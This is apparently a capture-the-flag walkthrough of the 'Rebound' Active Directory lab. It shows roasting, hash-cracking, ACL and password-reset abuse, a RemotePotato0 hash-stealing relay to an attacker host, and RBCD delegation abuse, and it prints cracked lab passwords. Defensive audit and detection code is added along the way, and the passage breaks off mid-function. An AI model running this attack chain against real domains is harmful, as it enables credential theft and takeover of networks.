A Windows machine that comprises a multitude of AD vulnerabilities.
Enumeration
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ sudo nmap -sC -sV -Pn 10.10.11.231
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-23 23:27 EST
Nmap scan report for rebound.htb (10.10.11.231)
Host is up (0.053s latency).
Not shown: 989 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-12-24 11:27:38Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:26+00:00; +7h00m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-12-24T11:28:27+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:26+00:00; +7h00m01s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: rebound.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.rebound.htb
| Not valid before: 2023-08-25T22:48:10
|_Not valid after: 2024-08-24T22:48:10
|_ssl-date: 2023-12-24T11:28:27+00:00; +7h00m01s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 7h00m00s
| smb2-time:
| date: 2023-12-24T11:28:20
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.41 seconds
Enumerating SMB and LDAP yielded nothing. However, I was able to connect to SMB unauthenticated (as Guest, without any permissions) using rpcclient, so I proceeded to enumerate potential users with RID cycling.
┌──(kali㉿kali)-[~/Desktop/CTF/Windows Stuff]
└─$ crackmapexec smb 10.10.11.231 -u "Guest" -p ''
SMB 10.10.11.231 445 DC01 [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:rebound.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.231 445 DC01 [+] rebound.htb\Guest:
┌──(kali㉿kali)-[~/Desktop/CTF/Windows Stuff]
└─$ ridenum 10.10.11.231 0 20000 Guest ''
[*] Attempting lsaquery first...This will enumerate the base domain SID
[*] Successfully enumerated base domain SID. Printing information:
Domain Name: rebound
Domain Sid: S-1-5-21-4078382237-1492182817-2568127209
[*] Moving on to extract via RID cycling attack..
[*] Enumerating user accounts.. This could take a little while.
Account name: rebound\Administrator
Account name: rebound\Guest
Account name: rebound\krbtgt
Account name: rebound\DC01$
Account name: rebound\ppaul
Account name: rebound\llune
Account name: rebound\fflock
Account name: rebound\jjones
Account name: rebound\mmalone
Account name: rebound\nnoon
Account name: rebound\ldap_monitor
Account name: rebound\oorend
Account name: rebound\winrm_svc
Account name: rebound\batch_runner
Account name: rebound\tbrady
Account name: rebound\delegator$
[*] RIDENUM has finished enumerating user accounts...
I then tried AS-REP roasting, hoping for a quick win for initial access, but I could not crack the hash, which probably meant this was not the intended path.
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-GetNPUsers -dc-ip 10.10.11.231 -request -format hashcat -usersfile users.txt rebound.htb/
Impacket v0.11.0 - Copyright 2023 Fortra
$krb5asrep$23$jjones@REBOUND.HTB:06a2bf6dd3cfdb587387c2d53bf69a0c$f3b60b15f622dbbde4153402b6320449e99e574a4f5c691fe415cec470cb8f52c3d4d3ae1d2c0029b23f7cab1751aaa493cf48c63c93358774333705ee62c827d33ee30503a81955ae1105ba4532d106c8ec07611af9c23b3d43a57f12c92f9cac5cb1c13a0f3576dde3fa29b2e1e484c227e615ea196a9fef98a31c552767e2b73892228cf77e55607adc1fb82712d39537f5c88db47c8e12c1d713789de07c6f561d5a86f0cbecf54c9e7232355c8af83c69aa60fc54915019b7e965496a5b15fa6dbfc45a9df367033a9233bf20a64b7aa8356fc300f9c906cef1c308b33a58c01057f3b332638f1b
[-] User tbrady doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ppaul doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mmalone doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Guest doesn't have UF_DONT_REQUIRE_PREAUTH set
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ hashcat jjones_asrep_hash.txt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
...
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP)
Hash.Target......: $krb5asrep$23$jjones@REBOUND.HTB:06a2bf6dd3cfdb5873...638f1b
Time.Started.....: Sat Dec 23 23:39:49 2023 (13 secs)
Time.Estimated...: Sat Dec 23 23:40:02 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1270.6 kH/s (0.86ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344384/14344384 (100.00%)
Rejected.........: 0/14344384 (0.00%)
Restore.Point....: 14344384/14344384 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b6d3831303838] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 59%
Started: Sat Dec 23 23:39:31 2023
Stopped: Sat Dec 23 23:40:04 2023
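The AS-REP roasting attempt above works only because the jjones account has the DONT_REQ_PREAUTH bit set in userAccountControl. The following is an added audit helper (my own example, not code from the writeup or from impacket) that decodes that attribute and lists enabled accounts exposed this way, together with the LDAP filter a defender would run against the domain to find them. The directory entries are constructed to mirror the writeup's finding; the SPN value on ldap_monitor and the old_svc account are placeholders, not data from the box.

```python
# Added example (not code from the writeup): decode userAccountControl and
# report enabled accounts with DONT_REQ_PREAUTH, the bit that made jjones
# AS-REP roastable. Entries are constructed; a real audit would feed the
# results of an LDAP search into audit_preauth().

# Documented userAccountControl bits (MS-ADTS 2.2.16).
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "NORMAL_ACCOUNT": 0x0200,
    "WORKSTATION_TRUST_ACCOUNT": 0x1000,
    "SERVER_TRUST_ACCOUNT": 0x2000,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,
    "NOT_DELEGATED": 0x100000,
    "DONT_REQ_PREAUTH": 0x400000,
    "TRUSTED_TO_AUTH_FOR_DELEGATION": 0x1000000,
}

# LDAP_MATCHING_RULE_BIT_AND: lets an LDAP filter test a single bit server-side.
LDAP_BIT_AND = "1.2.840.113556.1.4.803"


def decode_uac(value):
    """Return the set of flag names present in a userAccountControl value."""
    return {name for name, bit in UAC_FLAGS.items() if value & bit}


def ldap_filter_for(flag_name):
    """LDAP filter for enabled user objects carrying the given UAC bit."""
    bit = UAC_FLAGS[flag_name]
    disabled = UAC_FLAGS["ACCOUNTDISABLE"]
    return (f"(&(objectCategory=person)(objectClass=user)"
            f"(userAccountControl:{LDAP_BIT_AND}:={bit})"
            f"(!(userAccountControl:{LDAP_BIT_AND}:={disabled})))")


def audit_preauth(entries):
    """List enabled accounts that do not require Kerberos pre-authentication.

    Disabled accounts are skipped (the KDC will not issue them anything).
    Each finding records whether the account also has an SPN, since such an
    account is exposed to both AS-REP roasting and Kerberoasting.
    """
    findings = []
    for entry in entries:
        flags = decode_uac(entry["userAccountControl"])
        if "DONT_REQ_PREAUTH" not in flags or "ACCOUNTDISABLE" in flags:
            continue
        findings.append({
            "account": entry["sAMAccountName"],
            "has_spn": bool(entry.get("servicePrincipalName")),
            "fix": "clear DONT_REQ_PREAUTH, then rotate the password",
        })
    return findings


# Constructed sample entries (not real LDAP output from the box). The SPN on
# ldap_monitor and the old_svc account are placeholders.
SAMPLE_ENTRIES = [
    {"sAMAccountName": "jjones", "userAccountControl": 0x400200, "servicePrincipalName": []},
    {"sAMAccountName": "tbrady", "userAccountControl": 0x200, "servicePrincipalName": []},
    {"sAMAccountName": "ldap_monitor", "userAccountControl": 0x10200,
     "servicePrincipalName": ["ldapmonitor/dc01.rebound.htb"]},
    {"sAMAccountName": "old_svc", "userAccountControl": 0x400202, "servicePrincipalName": []},
]

if __name__ == "__main__":
    for finding in audit_preauth(SAMPLE_ENTRIES):
        print(finding)
    print(ldap_filter_for("DONT_REQ_PREAUTH"))
```

Only jjones is reported: old_svc carries the same bit but is disabled, so it yields nothing to roast. The filter string is what you would hand to `ldapsearch` or `Get-ADUser -LDAPFilter` to get the live list.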
After a very long time, I stumbled across this article about Kerberoasting without pre-authentication. Similar to AS-REP roasting, the technique leverages two things we already have.
To keep myself sane from all the impacket branch errors I was receiving, I decided to use a Windows VM and perform the attack using Rubeus and its /nopreauth parameter.
PS C:\Users\nicholas\Desktop > ./Rubeus.exe kerberoast /outfile:kerberoastables.txt /domain:"rebound.htb" /dc:"DC01.rebound.htb" /nopreauth:"jjones" /spns:C:\Users\nicholas\Desktop\users.txt
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.1
[*] Action: Kerberoasting
[*] Using jjones without pre-auth to request service tickets
[*] Target SPN : Administrator
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : Guest
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : krbtgt
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt
[*] Target SPN : DC01$
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt
[*] Target SPN : ppaul
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : llune
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : fflock
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : jjones
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : mmalone
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : nnoon
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : ldap_monitor
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt
[*] Target SPN : oorend
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : winrm_svc
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : batch_runner
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : tbrady
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Target SPN : delegator$
[*] Using domain controller: DC01.rebound.htb (10.10.11.231)
[*] Hash written to C:\Users\nicholas\Desktop\kerberoastables.txt
[*] Roasted hashes written to : C:\Users\nicholas\Desktop\kerberoastables.txt
Commando VM 01/19/2024 04:32:31
We can now try to crack these hashes using hashcat and rockyou, which gives us the password of ldap_monitor.
PS C:\Users\Admin\Downloads\hashcat-6.2.6\hashcat-6.2.6> .\hashcat.exe .\kerberoastables.txt .\rockyou.txt -m 13100
hashcat (v6.2.6) starting
Successfully initialized the NVIDIA main driver CUDA runtime library.
Failed to initialize NVIDIA RTC library.
* Device #1: CUDA SDK Toolkit not installed or incorrectly installed.
CUDA SDK Toolkit required for proper device support and utilization.
Falling back to OpenCL runtime.
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
OpenCL API (OpenCL 3.0 CUDA 12.2.68) - Platform #1 [NVIDIA Corporation]
=======================================================================
* Device #1: NVIDIA GeForce RTX 3060 Ti, 8064/8191 MB (2047 MB allocatable), 38MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashfile '.\kerberoastables.txt' on line 1 ($krb5t...4D5680553C119B86D292DEFCDD2440D3): Separator unmatched
Hashfile '.\kerberoastables.txt' on line 2 ($krb5t...7605771D47A8BAF35BE68F999FEB075C): Separator unmatched
Hashfile '.\kerberoastables.txt' on line 4 ($krb5t...DF98A1F9E012EF7C76CB77E5571E4F16): Separator unmatched
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 333 MB
Dictionary cache hit:
* Filename..: .\rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
$krb5tgs$23$*ldap_monitor$rebound.htb$ldap_monitor*$bf482204b205a0ec5544a9c3efc7fd0b$eefbb2ffa6ccb05ad554d7e2116f87de4da6bfd4617f19a a1e83a4d3ecc700cafca0f3b2fa2f7840398ed5a12bbba7c5ec5a61e98b7876a2b2b8c9d5c874a269df71e6801167ed703dddd4cf661cc11242efbab0d581b1fe8b2b be8798330f912621d5a2cf34fce238c66b7f2fb20c37e2045ceccb2f89bc0a551ddfb43d024e3dc993e20d509da1905c813a48370672e5a372fd5995eb0698d0ee621 1aa7835be9b95df254c90fbcc2015bbc158d6dd91eac729adf9e3fee4d31fa7a26b9caefaf07f2fe6e76702b8e6dc359e20d83e9cf7b99ba3684e900fd38bf7645534 499cb23b0d973ac95f0b70deca3364a07d2775aaf51c27d2f92df7a8c8199ba1bfff9ed404c964f1eed2b376b09c4e190c3f9ddff8276ccddd1ae9829f88054efc27f fac6e475d67a5a838da89e0aac61d8011dea6058238693d9390213eeb0b9e1e7637cb1b4d0c27ced6bfd17e2abfdd72b13cc50138be85951f9fc5a9583d8c2dd039a3 325a25395a579ee122412342fa79827cd8a2743658f3ee0cd281e6e83b5b36d15ba27479c7276a4b58a8b9238aae7ff579ea72aaab0bdd3cb640f9a39df96a2b211df fb09b0a88940d6654bcd2de4daaeb69c0c35b0dc5ba88588ede34e4e26ea776b893e317c0691fbadad090d7b38dbabf32b37b7bc4bd32e6dabb3a3709727d18af0df9 9423ad2e81d40f0cef7adb272df4d536d2802fdf201f0ac05019194fb38b0dc60d4f9d284afdeea1be32265e9cedc3e360a6be7ffa08a1261beb933c049af1d9e8f8d da59e2c1cd3c7186422456f7ef52c2e42641aad761ea94f2d1837a477fceff40b6abc9eb9f6d7e6467ded8925d36dc54ff2a4cf567df708273e72f1e33e4cf8f194e3 39071a080c525af589811eac49e64776f492dbfdf9f32e63dd574bc6c5efabfa7fe28148cac01be172adde18e2105b1c56a048cc134726cbb8baa744de0c32fb2c502 2d43da79e3d3632b3d2c7d75b419802ce3110883cfc19e9a65f01b4006edb7e0ea889ed43ef9b073abb091da9db9114bc60a37fb0075d1856c2715a31fd87f826b499 997d703ab68f383c67c2d325189210f9fe00c2f40c46c771b04008384fa019cd2b2264aeb01de837a60a0bdd3a0e24b971c8a95d834d89c954bd1c02b0b5538863dca a15e16f5d848227305cb24d65ca106f30ce49c3928cdf96ccf595b8247564d2af9744023a83f9b8ba0a28672e766def4de9a07b9d297bbd9d28c7264f110ca063f0a4 
4cd71547418240a9fa0711b4b0289057d123cb85d6db5b50e08fdcd844dfb8ac8aa94baabfceda9df0c9599d874878d30f3679a2f26a9fa2df65c6289593cade54:1G GR8t@$$4u
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ldap_monitor$rebound.htb$ldap_monitor*...cade54
Time.Started.....: Fri Jan 19 20:40:48 2024 (1 sec)
Time.Estimated...: Fri Jan 19 20:40:49 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (.\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 18875.9 kH/s (6.48ms) @ Accel:1024 Loops:1 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 13697024/14344384 (95.49%)
Rejected.........: 0/13697024 (0.00%)
Restore.Point....: 12451840/14344384 (86.81%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: 40432330 -> 0860478331
Hardware.Mon.#1..: Temp: 61c Fan: 69% Util: 29% Core:1995MHz Mem:6800MHz Bus:16
Started: Fri Jan 19 20:40:46 2024
Stopped: Fri Jan 19 20:40:49 2024
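From the defender's side, the Rubeus run above leaves a distinctive trail on the domain controller: the /nopreauth variant sends AS-REQs whose service name is not krbtgt (logged as event 4768), while classic Kerberoasting shows up as 4769 service-ticket events with RC4 (etype 0x17) for user-account SPNs, and both produce a burst of requests for many distinct services from one source. The detection below is an added example of mine, not code from the writeup or from any tool it uses. The events are constructed to resemble that run (field names follow the 4768/4769 XML; timestamps, IPs and the mmalone and tbrady requests are made up).

```python
# Added example (not from the writeup): triage Kerberos events 4768/4769 for
# the roasting patterns seen above. Events are constructed; in practice they
# would come from the DC's Security log via a SIEM or log forwarder.
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = "0x17"   # TicketEncryptionType for RC4-HMAC, the type roasting tools ask for
SUCCESS = "0x0"     # Status of a request the KDC actually fulfilled


def _is_user_spn(service_name):
    """krbtgt and computer accounts ($) are routine; user-account SPNs are what gets roasted."""
    return service_name.lower() != "krbtgt" and not service_name.endswith("$")


def detect_kerberoast(events, burst_threshold=3, window=timedelta(seconds=60)):
    """Return alerts for: AS-REQs naming a service instead of krbtgt (4768),
    RC4 service tickets for user-account SPNs (4769), and one requester asking
    for >= burst_threshold distinct services inside `window`."""
    alerts = []
    per_requester = defaultdict(list)
    for ev in events:
        if ev["Status"] != SUCCESS:
            continue  # a rejected request yields nothing crackable
        svc = ev["ServiceName"]
        if ev["EventID"] == 4768 and svc.lower() != "krbtgt":
            # The pre-auth-less variant never produces a 4769 at all; the
            # tell is an AS-REQ whose sname is a service account.
            alerts.append({"type": "as_req_for_spn", "requester": ev["TargetUserName"],
                           "service": svc, "ip": ev["IpAddress"]})
        elif ev["EventID"] == 4769 and ev["TicketEncryptionType"] == RC4_HMAC and _is_user_spn(svc):
            alerts.append({"type": "rc4_user_spn", "requester": ev["TargetUserName"],
                           "service": svc, "ip": ev["IpAddress"]})
        if svc.lower() != "krbtgt":
            per_requester[(ev["TargetUserName"], ev["IpAddress"])].append(ev)

    # Sliding window over each requester's non-krbtgt requests.
    for (user, ip), evs in per_requester.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        for i, ev in enumerate(evs):
            start = ev["TimeCreated"] - window
            services = {e["ServiceName"] for e in evs[: i + 1] if e["TimeCreated"] >= start}
            if len(services) >= burst_threshold:
                alerts.append({"type": "spn_burst", "requester": user, "ip": ip,
                               "services": sorted(services)})
                break  # one burst alert per requester is enough
    return alerts


def _ev(event_id, ts, user, service, etype, ip, status=SUCCESS):
    return {"EventID": event_id, "TimeCreated": datetime.fromisoformat(ts),
            "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip, "Status": status}


# Constructed events. The jjones lines mimic the Rubeus /nopreauth run (the
# ppaul request fails with KDC_ERR_S_PRINCIPAL_UNKNOWN, 0x7, because ppaul has
# no SPN); the mmalone line is a classic RC4 TGS request; tbrady is benign AES.
SAMPLE_EVENTS = [
    _ev(4768, "2024-01-19T04:32:20", "jjones", "ldap_monitor", RC4_HMAC, "10.10.16.17"),
    _ev(4768, "2024-01-19T04:32:21", "jjones", "DC01$", RC4_HMAC, "10.10.16.17"),
    _ev(4768, "2024-01-19T04:32:22", "jjones", "delegator$", RC4_HMAC, "10.10.16.17"),
    _ev(4768, "2024-01-19T04:32:23", "jjones", "ppaul", RC4_HMAC, "10.10.16.17", status="0x7"),
    _ev(4768, "2024-01-19T09:14:00", "tbrady", "krbtgt", "0x12", "10.10.11.51"),
    _ev(4769, "2024-01-19T09:15:00", "mmalone", "ldap_monitor", RC4_HMAC, "10.10.11.50"),
    _ev(4769, "2024-01-19T09:16:00", "tbrady", "DC01$", "0x12", "10.10.11.51"),
]

if __name__ == "__main__":
    for alert in detect_kerberoast(SAMPLE_EVENTS):
        print(alert)
```

Running it yields three `as_req_for_spn` alerts, one `rc4_user_spn` alert and one `spn_burst` alert for jjones; tbrady's AES requests produce nothing. The burst rule is what catches the spray regardless of encryption type, which matters once RC4 is disabled and an attacker requests AES tickets instead.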
Initial Foothold
After obtaining domain credentials, I proceeded to map the domain using BloodHound and found a route for lateral movement to user access, but not with the users we have on hand.
From the graph above, our main goal is to either:
Obtain either the PPAUL or FFLOCK user account, OR
Enroll ourselves as a group member of SERVICEMGMT somehow
Obtain either PPAUL or FFLOCK user account
Using the existing password obtained from the ldap_monitor account, I performed password spraying with crackmapexec and got a match on the user oorend.
Sadly, the password spraying did not work on either PPAUL or FFLOCK.
Enroll ourselves as a group member of SERVICEMGMT somehow
I then remembered that some ACL permissions are not explicitly shown in BloodHound and must be enumerated explicitly using something like PowerView's FindDomainObjectAcl. However, I kept receiving the error Server not operational.
I then struggled to find a Linux alternative until I finally stumbled across impacket's dacledit, which allows me to enumerate whether the principal oorend has any permissions over the target SERVICEMGMT group.
Referencing the BloodHound graph earlier, the SERVICEMGMT group has GenericAll (Full Control) over the OU SERVICE USERS.
Once again, we can use impacket's dacledit to grant oorend full control over that OU.
┌──(kali㉿kali)-[~/…/Boxes/Rebound/impacket-master/examples]
└─$ python3 dacledit.py -action 'write' -rights 'FullControl' -inheritance -principal 'oorend' -target-dn 'OU=SERVICE USERS,DC=REBOUND,DC=HTB' rebound.htb/'oorend':'1GR8t@$$4u' -dc-ip 10.10.11.231 -k -use-ldaps
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20240119-175009.bak
[*] DACL modified successfully!
As oorend, we now have full control over the OU Service Users and, through inheritance, over winrm_svc.
We can now change the password of winrm_svc using rpcclient and then PS-Remote in to get the user flag.
└─$ rpcclient -U rebound.htb/oorend rebound.htb
Password for [REBOUND.HTB\oorend]:
rpcclient $> setuserinfo2 winrm_svc P@ssw0rd
Usage: setuserinfo2 username level password [password_expired]
result was NT_STATUS_INVALID_PARAMETER
rpcclient $> setuserinfo2 winrm_svc 23 P@ssw0rd
rpcclient $>
Privilege Escalation
Using query user, we see that the user tbrady is logged on.
PS C:\Users\winrm_svc>
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
tbrady console 1 Active none 25/11/2023 8:24 AM
For some reason, the same command no longer gives me this output as of 20/1/2024.
PS C:\Users\winrm_svc\Documents> query user
No User exists for *
From here, we can utilize RemotePotato0, which lets us capture the NTLMv2 hash of any user logged in on the target machine, in this case tbrady.
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:10.10.11.231:9999
PS C:\Users\winrm_svc\Documents> .\RemotePotato0.exe -m 2 -x 10.10.16.17 -p 9999 -s 1
[*] Detected a Windows Server version not compatible with JuicyPotato. RogueOxidResolver must be run remotely. Remember to forward tcp port 135 on (null) to your victim machine on port 9999
[*] Example Network redirector:
sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:{{ThisMachineIp}}:9999
[*] Starting the RPC server to capture the credentials hash from the user authentication!!
[*] Spawning COM object in the session: 1
[*] Calling StandardGetInstanceFromIStorage with CLSID:{5167B42F-C111-47A1-ACC4-8EABE61B0B54}
[*] RPC relay server listening on port 9997 ...
[*] Starting RogueOxidResolver RPC Server listening on port 9999 ...
[*] IStoragetrigger written: 104 bytes
[*] ServerAlive2 RPC Call
[*] ResolveOxid2 RPC call
[+] Received the relayed authentication on the RPC relay server on port 9997
[*] Connected to RPC Server 127.0.0.1 on port 9999
[+] User hash stolen!
NTLMv2 Client : DC01
NTLMv2 Username : rebound\tbrady
NTLMv2 Hash : tbrady::rebound:25cb25d078aa7cda:5d015a1e05ab333b0fc68d64bd26e5c7:01010000000000004c7bf203dc4bda0194875567cf8b3e9e0000000002000e00720
0650062006f0075006e006400010008004400430030003100040016007200650062006f0075006e0064002e006800740062000300200064006300300031002e007200650062006f0075006e
0064002e00680074006200050016007200650062006f0075006e0064002e00680074006200070008004c7bf203dc4bda0106000400060000000800300030000000000000000100000000200
000dec4cf9ef2d2a48c6c2af0bea86ea62183c13f07d827c4a1ebcfecd25e1a2f800a00100000000000000000000000000000000000090000000000000000000000
Cracking with rockyou, we get the password 543BOMBOMBUNmanda.
Looking back at bloodhound, we see that user tbrady has ReadGMSAPassword over DELEGATOR$.
The name of the account suggests exploiting something related to delegation. To enumerate the delegation properties of the DELEGATOR$ account, we need to use PowerView's Get-NetComputer and filter the properties.
We see that DELEGATOR$ has the msDS-AllowedToDelegateTo property set to the service http/dc01.rebound.htb.
However, from our BloodHound output, the Administrator user cannot be delegated.
With reference to this, RBCD (Resource-based Constrained Delegation) can be used to bypass this.
To perform this attack, we need two things, which we already have:
An account with an SPN: the ldap_monitor user fits the requirement
An account with the capability to edit the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of another object, OR
Using impacket's rbcd, we can exploit this by appending ldap_monitor to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute of DELEGATOR$.
┌──(kali㉿kali)-[~/Desktop/CTF/Boxes/Rebound]
└─$ impacket-rbcd 'rebound.htb/delegator$' -delegate-to 'delegator$' -delegate-from ldap_monitor -use-ldaps -action write -k -no-pass
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)
[*] ldap_monitor can already impersonate users on delegator$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*] ldap_monitor (S-1-5-21-4078382237-1492182817-2568127209-7681)
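Both the dacledit step earlier (oorend rewriting the DACL of OU=SERVICE USERS) and the rbcd step just above (delegator$ writing its own msDS-AllowedToActOnBehalfOfOtherIdentity) are LDAP writes to a handful of attributes that almost never change legitimately, and each one is recorded as Windows Security event 5136 when directory-service auditing is enabled. The triage routine below is an added example of mine, not code from the writeup or from impacket. The 5136 records are constructed to match those two commands; the DN of the delegator computer object, the tbrady DN and the Tier-0 allowlist are assumptions, since the writeup does not show them.

```python
# Added example (not from the writeup): flag 5136 (directory object modified)
# events that write attributes used for ACL abuse and delegation abuse.
# Events are constructed; real ones come from the DC's Security log.

SENSITIVE_ATTRIBUTES = {
    "ntsecuritydescriptor": "ACL rewrite (possible GenericAll/WriteDACL abuse)",
    "msds-allowedtoactonbehalfofotheridentity": "RBCD configured",
    "msds-allowedtodelegateto": "constrained delegation target changed",
    "serviceprincipalname": "SPN added/removed (roasting or Kerberos spoofing)",
    "useraccountcontrol": "account flags changed (pre-auth, delegation bits)",
}

# 5136 OperationType values: %%14674 = Value Added, %%14675 = Value Deleted.
OP_VALUE_ADDED = "%%14674"

# Accounts expected to make such changes; everything else gets reviewed. Assumed.
TIER0_ALLOWLIST = {"rebound\\administrator"}


def _rdn(dn):
    """First RDN value of a DN, e.g. 'delegator' from 'CN=delegator,CN=Computers,...'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def triage_5136(events, allowlist=TIER0_ALLOWLIST):
    """Return one finding per 5136 event that touches a sensitive attribute
    from outside the allowlist. Deletions are kept too: removing an ACE or a
    delegation entry can be as hostile as adding one."""
    findings = []
    for ev in events:
        attr = ev["AttributeLDAPDisplayName"].lower()
        if attr not in SENSITIVE_ATTRIBUTES:
            continue
        subject = f'{ev["SubjectDomainName"]}\\{ev["SubjectUserName"]}'.lower()
        if subject in allowlist:
            continue
        # A principal editing its own object is the RBCD signature: the
        # computer account writes the descriptor on itself.
        self_write = (ev["SubjectUserName"].lower().rstrip("$")
                      == _rdn(ev["ObjectDN"]).lower().rstrip("$"))
        findings.append({
            "subject": subject,
            "object": ev["ObjectDN"],
            "attribute": ev["AttributeLDAPDisplayName"],
            "operation": "added" if ev["OperationType"] == OP_VALUE_ADDED else "deleted",
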